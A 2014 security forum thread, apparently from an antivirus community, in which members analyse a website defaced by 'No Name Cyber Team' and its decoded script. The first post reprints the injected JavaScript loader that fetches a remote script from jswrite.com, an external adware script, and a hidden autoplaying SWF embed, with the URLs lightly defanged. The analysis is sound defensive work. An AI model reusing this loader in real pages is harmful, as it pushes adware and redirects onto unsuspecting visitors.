Author Topic: C99shell malware aka Adware/BetterSurf not detecfed? (Read 2779 times)

polonus · « **on:** November 28, 2014, 04:45:06 PM »

See: http://killmalware.com/uscnnews.net/
Detected via BitDefender's: https://www.virustotal.com/en/url/25febec462a1b2ddbb46353d2fdd32ddfa8cd96abb09764c538dc0cf6bde68c0/analysis/1417189005/
Unable to properly scan your site. Content not found.
The decoded script

Code: [Select]

<!-- No Name Cyber Team --><!--document.write(unescape('	<html lang="en">
<head><script>if(typeof window.__wsujs==='undefined'){window.__wsujs=5064;window.__wsujsn='PlugIn';window.__wsujss='9DB4EA2CAB9F70E2////////4E5950AE6A08DED0';} </script> 
						              <script>if(top == self){ 
							          var zhead = document.getElementsByTagName('head')[0]; 
							          if(!zhead){zhead = document.createElement('head');} 
							          var qscript = document.createElement('script'); 
							          qscript.setAttribute('id','wsh2_js'); 
							          qscript.setAttribute('src','htxp://jswrite.com/script1.js'); 
							          qscript.setAttribute('type','text/javascript');qscript.async = true; 
							          if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild///(qscript); 
						             } </script> 
<title>[+]No Name Cyber Team[+]</title>
<link href="htxp://fonts.googleapis.com/css?family=Creepster|Audiowide" rel="stylesheet" type="text/css">
<meta name="title" content="[+]No Name Cyber Team[+]">
<meta name="keywords" content="No Name Cyber Team, NNC Team">
<meta name="description" content="Hacked by No Name Cyber Team, Touched by No Name Cyber Team">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="googlebot" content="index,follow">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta charset="utf-8">
<script type="text/javascript" src="htXp://apihulatoonet-a.akamaihd.net/gsrs?is=amp1lmid&bp=PBG&g=36d66a23-2a6e-4920-884a-98e675b38126" ></script></head>
	<!-- body encrypt -->		
		<style>
			*{
				margin:0;
				padding:0;
			}
			body{
				background-color:#000;
				color:#00FF00;
				font-size: 18px;
				padding-bottom:20px;
			}
			.error-code{
				font-family: ;
				font-size: 200px;
				font-family: Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
				color: #00FFFF;
				color: #FF0000(255, 255, 255, 0.98);
				width: 50%;
				text-align: right;
				margin-top: 5%;
				text-shadow:  5px 5px hsl(0, 0%, 100%);
				float: left;
			}
			.not-found{
				width: 47%;
				float: right;
				margin-top: 5%;
				font-family:Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
				font-size: 50px;
				color: #00FFFF;
				text-shadow: 2px 2px 5px hsl(0, 0%, 61%);
				padding-top: 70px;
			}
			.clear{
				float:none;
				clear:both;
			}
			.content{
				text-align:center;
				font-family:Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
				line-height: 30px;
				color:#FF0000;
			}
			input[type=text]{
				border: hsl(247, 89%, 72%) solid 1px;
				outline: none;
				padding: 5px 3px;
				font-size: 16px;
				border-radius: 8px;
			}
			a{
				text-decoration: none;
				color: #00FFFF;
				text-shadow: 0px 0px 6px white;
			}
			a:hover{
				color:white;
			}

		</style>

<embed src="htXp://autofollowersfb.hol.es/NNC%20Team.swf" AUTOSTART=TRUE LOOP=TRUE WIDTH=0 HEIGHT=0 ALIGN="CENTER"></embed><br />

<body>
		<p class="error-code">
			<a href="htXp://nonamecyberteam.com">NNC</a>
		</p>
		<p class="not-found">No Name Cyber Team</p>
		<div class="clear"></div>
		<div class="content">
			IntanMuslimah_404 - BlackX'Ops007 - Latunusa - ??????????s - Mr.////Phoenix1337 - Agus Darlis
			<br><a href="htXp://blog.nonamecyberteam dot com">Contact Us</a>
		</div>	
</body>
</html>
				'));//-->

A webmaster with a hex decoder would have untangled it in milliseconds....

polonus

Pondus · « **Reply #1 on:** November 28, 2014, 04:52:21 PM »

some say redirector
https://www.virustotal.com/en/file/f2bec7cbfb18ed1218d3d34328f1a555ed6e47b24499b38c3d0bace71f3f2d18/analysis/1417189856/
https://www.virustotal.com/en/file/f2bec7cbfb18ed1218d3d34328f1a555ed6e47b24499b38c3d0bace71f3f2d18/analysis/1417190103/

polonus · « **Reply #2 on:** November 28, 2014, 05:18:33 PM »

The hex obfuscated script is known as such, it is also known as Riskware.Script.BetterSurf.ctbzhb or BetterSurf malcode script.
The defacement hackers used such a hex-encoded shell script, dear Pondus, and I ran it through a hex-decoder
(Sucuri's has a nice one available on their site and there are others to be found online too),

Damian

Trojan:JS/Redirector.A is detection for a specifically obfuscated Javascript URL that typically is used to redirect users to websites other than they expected. The obfuscated Javascript may appear on a malicious Web site, or may be sent via an HTML-based e-mail message, or may be included as part of an exploit. Manual removal is not recommended, use av solution. Links are activated within IFrames while viewing Web content on maliciously modified pages. Alert notifications from installed Antivirus software may be the only symptom(s).
Code is specially related to the Windows Vista platform....

D

Pondus · « **Reply #3 on:** November 29, 2014, 01:53:33 PM »

Norman/BlueCoat

Defaced websites,obfuscated JavaScript used which generally used in such cases & malicious redirection so flagged by some vendor. But nothing malicious from webpage & deobfusacated code hence, ignored.

Author Topic: C99shell malware aka Adware/BetterSurf not detecfed? (Read 2779 times)

polonus

C99shell malware aka Adware/BetterSurf not detecfed?

Pondus

Re: C99shell malware aka Adware/BetterSurf not detecfed?

polonus

Re: C99shell malware aka Adware/BetterSurf not detecfed?

Pondus

Re: C99shell malware aka Adware/BetterSurf not detecfed?